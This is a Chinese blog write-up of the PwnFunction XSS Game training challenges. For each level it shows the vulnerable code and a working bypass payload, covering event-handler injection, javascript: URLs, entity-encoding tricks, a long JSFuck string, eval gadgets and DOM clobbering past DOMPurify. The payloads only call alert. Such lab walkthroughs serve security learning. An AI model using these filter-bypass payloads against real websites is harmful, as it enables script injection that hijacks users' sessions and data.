XSS实验记录

最新推荐文章于 2024-10-19 21:06:11 发布
最新推荐文章于 2024-10-19 21:06:11 发布
阅读量1.7k 收藏 53
点赞数 34
文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58742048/article/details/141286366
版权

目录

XXS地址

实验过程

Ma Spaghet

Jeff 

Ugandan Knuckles 

Ricardo Milos 

Ah That's Hawt 

Ligma 

Mafia 

 Ok, Boomer

XXS地址

XSS Game - Learning XSS Made Simple! | Created by PwnFunction

实验过程

Ma Spaghet

要求我们弹出一个alert(1337)sandbox.pwnfunction.com窗口 

<!-- Challenge -->
<h2 id="spaghet"></h2>
<script>
    spaghet.innerHTML = (new URL(location).searchParams.get('somebody') || "Somebody") + " Toucha Ma Spaghet!"
</script>

这段代码在一个URL类里通过get接收参数somebody如果没参数就默认接收Somebody参数,之后将它放入innerHTML中,最后再调用进h2标签中。这里禁用<script>标签,但我们可以使用<img>标签去进行编写

这里在url后插入

?somebody=<img%20src=1%20οnerrοr="alert(1337)">

输出: 

 

Jeff 

<!-- Challenge -->
<h2 id="maname"></h2>
<script>
    let jeff = (new URL(location).searchParams.get('jeff') || "JEFFF")
    let ma = ""
    eval(`ma = "Ma name ${jeff}"`)
    setTimeout(_ => {
        maname.innerText = ma
    }, 1000)
</script>

 这里的代码使用get传参的方式,给jeff一个值,将值传给let jeff,变量ma然后执行Ma name +jeff传入的值,setTimeout是延时执行ma,同时ma还带了一个ineerText的属性 

这里直接使用

?jeff=aaa";alert(1337);"

 

Ugandan Knuckles 

 

<!-- Challenge -->
<div id="uganda"></div>
<script>
    let wey = (new URL(location).searchParams.get('wey') || "do you know da wey?");
    wey = wey.replace(/[<>]/g, '')
    uganda.innerHTML = `<input type="text" placeholder="${wey}" class="form-control">`
</script>

这部分代码过滤掉了<>尖括号 

这里我们能使用点击事件onclick函数,或者onfocus函数

 ?wey=aaa"%20οnfοcus=alert(1337)%20autofocus="

 

Ricardo Milos 

 

<!-- Challenge -->
<form id="ricardo" method="GET">
    <input name="milos" type="text" class="form-control" placeholder="True" value="True">
</form>
<script>
    ricardo.action = (new URL(location).searchParams.get('ricardo') || '#')
    setTimeout(_ => {
        ricardo.submit()
    }, 2000)
</script>

在定时器里有一个submmit这个提交事件,获取了from表单的id,在两秒钟进行action的自动提交,而这个action是他接受的一个伪协议。伪协议事件是一种利用action属性中的特殊协议来执行JavaScript代码的技术,所以我们可以使用JavaScript来绕过。

?ricardo=JavaScript:alert(1337)

 

Ah That's Hawt 

<!-- Challenge -->
<h2 id="will"></h2>
<script>
    smith = (new URL(location).searchParams.get('markassbrownlee') || "Ah That's Hawt")
    smith = smith.replace(/[\(\`\)\\]/g, '')
    will.innerHTML = smith
</script>

这段代码过滤掉了( 、) 、` 和 \ ,然后再使用innerHTML将它放到h2标签。 

因为过滤掉了(),所以script无法使用,这里使用img的报错实现,因为括号被过滤,使用实体编码进行绕过。但因为url传参时会解码特殊字符,所以我们要对实体再编码一次。

?markassbrownlee=<img%20src=1%20οnerrοr=location="JavaScript:alert%25281337%2529">

 

Ligma 

/* Challenge */
balls = (new URL(location).searchParams.get('balls') || "Ninja has Ligma")
balls = balls.replace(/[A-Za-z0-9]/g, '')
eval(balls)

 这部分不能使用字母数字,只能使用编码的方式进行绕过

这里使用jsfuck :JSFuck - Write any JavaScript with 6 Characters: []()!+

 

再进行URLcoden编码 

获得

?balls=%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%5B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D((!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%2B%5B!%5B%5D%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B!%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(%2B(!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B%5B%2B!%2B%5B%5D%5D))%5B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%2B%5B%5D)%5B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D%5B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B((%2B%5B%5D)%5B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%2B%5B%2B!%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%5D%5D(!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%5D)%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D)()((!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%5D%2B%5B%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(%5B%2B%5B%5D%5D%2B!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D)

 

Mafia 

/* Challenge */
mafia = (new URL(location).searchParams.get('mafia') || '1+1')
mafia = mafia.slice(0, 50)
mafia = mafia.replace(/[\`\'\"\+\-\!\\\[\]]/gi, '_')
mafia = mafia.replace(/alert/g, '_')
eval(mafia)

过滤了  、'  、 " 、+ 、\ 、[] 与特殊字符alter,再然后还限制长度50个字符

这里使用function来构造匿名函数 ,使用大写+toLowerCase()转写来绕过特殊字符alter的限制

?mafia=Function(/ALERT(1337)/.source.toLowerCase())()

huo

 或是使用eval函数来进行转写

 ?mafia=eval(8680439..toString(30))(1337)

 

 Ok, Boomer

<!-- Challenge -->
<h2 id="boomer">Ok, Boomer.</h2>
<script>
    boomer.innerHTML = DOMPurify.sanitize(new URL(location).searchParams.get('boomer') || "Ok, Boomer")
    setTimeout(ok, 2000)
</script>

 本题存在过滤框架,基本上绕不过,⽆法直接 使用XSS的情况下,我我们使用 DOM Clobbering

这里javascript被过滤,所以就得使用它框架允许的进行替换 

 再替换框架的白名单

?boomer=<a%20id=ok%20href=mailto:alert(1337)>

 

若光光
关注
【渗透实例】记录一次XSS渗透过程
TeamsSix 的 CSDN 空间
07-03 2408
0x01 找到存在XSS的位置 没什么技巧,见到框就X,功夫不负有心人,在目标网站编辑收货地址处发现了存在XSS的地方,没想到这种大公司还会存在XSS。 [外链图片转存失败(img-qUL3DxC1-1562166261579)(https://mp.csdn.net/mdeditor/1)] 0x02 构造XSS代码连接到XSS平台 XSS平台给我们的XSS代码是这样的: </tExt...
XSS初学记录
Fizz`s Blog
11-02 613
之前对基本Web安全的书籍只是单纯的阅读过了,并未动手实践。今天试着对学校图书馆进行了一下XSS漏洞的挖掘,居然还真找到一个,记录一下。 在复旦大学图书馆下面的站内搜索框中并未对用户的input进行过滤 在其中输入Test测试, 可在源码中发现是用td标签闭合的构造payload ">alert("xss") 关闭Chrome过滤器后可成功弹窗。 一个很
XSS的键盘记录和cookie获取
Williamanddog的博客
01-26 1934
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混 淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意JavaScript代码,当用户浏览该页 面时,嵌入Web里面的JS代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的 攻击。 在一个Web页面上,有一种很常见的功能是将用户输入的内容输出到页面上。但是如果这里输入的内容 。
xss记录
g767415250的博客
03-10 154
1.查看标签找变量位置。 2.有直接可嵌入的地方直接插入。 3.该闭合的闭合适当使用 // 注释符号。 4.查看数据类型是否被转义 使用 单引号 ’ (有个小坑浏览器自动纠错,要查看源码) 针对这种情况可以使用事件调用js。 5.如果遇到标签属性过滤的情况只能多试几种方法寻找没有被过滤的属性进行插入。 6.这个绕过一定要有耐心多试一些规则,只有知道那些规则才能更好的绕过。比如说大小写的过滤规则 7.针对字段过滤,可以试一下在过滤字段中插入被过滤的字段 <script>ale
关于xss一些记录
qq_46854899的博客
04-19 466
Discipline is just choosing between what you want now and what you want most. —— Abraham Lincoln, 16th President of the United States 「自律是在你现在想要的和最想要的之间做抉择。」 —— 亚伯拉罕·林肯 (美国第 16 任总统) 跨站脚本攻击(Cross Site ...
XSS实验
IOE_270的博客
10-29 61
xss-labs
xss获取键盘记录实验演示
北冥有鱼
04-20 1478
实验之前,我们首先来了解一下什么事跨域 跨域-同源策略 为什么要有同源策略 没有的话只需要一个url就可以盗取你的信息了,不需要xss漏洞 我们来到pikachu,进入xss的存储型 我们首先来看一下后台,在pikachu xss的后台有键盘记录这么一个目录 我们需要去嵌入一个能够调用我们的远程js的方法 把这段代码放进去,点提交后,这个js就被嵌入到这个页面中了 我们打开控制台...
Web应用安全:XSS篡改页面(实验).docx
06-19
"Web应用安全:XSS篡改页面(实验)" 本节课将介绍Web应用安全中的一种常见攻击手法:跨站脚本攻击(Cross-Site Scripting,XSS)。XSS攻击是指攻击者在Web应用程序中注入恶意脚本,然后当用户访问该Web应用程序时...
DOM型XSS;cookie获取及XSS后台使用;XSS钓鱼演示;XSS获取键盘记录实验演示
qq_44696653的博客
04-21 2250
DOM型XSS DOM简介(摘录) 通过JavaScript,可以重构整个HTML文档,可以添加、移除、改变或重排页面上的项目。 要改变页面的某个东西,JavaScript就需要获得对HTML文档中所有元素进行添加、移动、改变或移除的方法和属性,都是通过文档对象模型来获得的(DOM)。 所以就可以将DOM理解为访问HTML的标准编程接口。 DOM型XSS漏洞演示 ...
XSS漏洞利用——键盘记录
cxrpty的博客
02-21 1422
实验环境:DVWA 实验原理:网页被植入xss脚本,普通用户访问此网页时,该用户在当前页面上所有的键盘按键都会被记录下来,并且发送到远端服务器 实验步骤: 一、在服务器创建一个keylog.php文件获取键盘记录,并将记录写入key.txt中。 php代码如下: <?php $file=fopen("key.txt","a"); if(isset($_REQUEST['key']...
实验XSS跨站脚本攻击原理与实践 总结记录
qq_34073852的博客
06-19 2920
111
【安全牛学习笔记】Kali Linux 安装-持久加密USB安装、熟悉环境、熟悉BASH命令
weixin_34159110的博客
09-06 1664
持久加密USB安装-1LUKS: linux UNified Key Setup 磁盘分区加密规范 不依赖于操作系统的磁盘级加密 Windows——DoxBox 后端:dm-crypt 前端:cryptsetup 微软的bitlocker将镜像刻录到U盘 dd if=kali-linux-1.1.0-amd64.iso of=/dev/sdb bs=1Mroot...
XSS闯关记录
Y4tacker的博客
07-21 8991
文章目录第一关第二关--闭合第三关第四关太简单了第五关--过滤了on关键字 第一关 没有任何的过滤,直接得到name=<script>alert()</script> 第二关–闭合 发现是在Value里面很简单闭合前面和后面即可,我的一种方案是 "onload="alert();"" 第三关 发现没啥用处,最后尝试出'onload="alert(1) 第四关太简单了 " onfocus="alert(/xss/) 第五关–过滤了on关键字 考虑用a标签,<a href
Xss-labs闯关总结
未完成的歌~的博客
07-13 8577
文章目录前言:Level 1 无过滤机制查看后台源码:通关代码:Level 2 闭合标签查看后台源码:通关代码:Level 3 单引号闭合 + 添加事件查看后台源码:通关代码:Level 4 双引号闭合 + 添加事件查看后台源码:通关代码:Level 5 新建标签查看后台源码:通关代码:Level 6 大小写绕过查看后台源码:通关代码:Level 7 双写绕过查看后台源码:通关代码:Level 8 编码绕过查看后台源码:通关代码:Level 9 检测关键字查看后台源码:通关代码:Level 10 隐藏信息查
CTFHUB技能树之XSS——反射型
weixin_73049307的博客
10-19 550
在地址栏中可以看到有GET传参,正好对应第一个输入框的CTFHub,猜测是会通过第一个输入框来影响输出的内容(有个大大的“Hello,CTFHub”)出现“successfully”,第二个输入框应该是在后台访问注入的信息。(这里我就不新建了,之前新建过了)可以看到通过该输入,改变页面内容。(一般会有声音提醒上线了)
利用配置错误的负载均衡器,通过XSS窃取Cookies
zkaq7777777的博客
10-14 710
通过将负载均衡器的主机头注入漏洞与XSS攻击结合,攻击者绕过了Cookies的保护机制,获得了未授权的敏感信息。在测试过程中,发现了负载均衡器的一个漏洞,该漏洞允许注入主机头(Host-Header)。通过注入自定义的 X-Forwarded-Host 头,攻击者能够混淆负载均衡器的 Cookie 检查,使其将 Cookies 转发到攻击者自己的服务器,而不是授权服务器(authz server)。这种注入会导致负载均衡器将 Cookies 转发到攻击者的协作服务器,而不是合法的授权服务器。
CTFHUB技能树之XSS——存储型
最新发布
weixin_73049307的博客
10-19 121
发现地址栏中的URL没有GET传参,而且这次是“Hello,no name”
[渗透测试] XSS跨站点脚本攻击 零基础入门教程
Da1NtY的博客
10-15 1096
跨站点脚本(Cross Site Scripting,XSS)是指客户端代码注入攻击。攻击者在合法的网站或Web应用程序中执行恶意脚本。当Web应用程序在其生成的输出中使用未经验证或未编码的用户输入时,就会发生XSSXSS主要使用JS来执行恶意攻击,因为JS可以操控HTML、CSS、浏览器等,所有就给了攻击者可乘之机。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值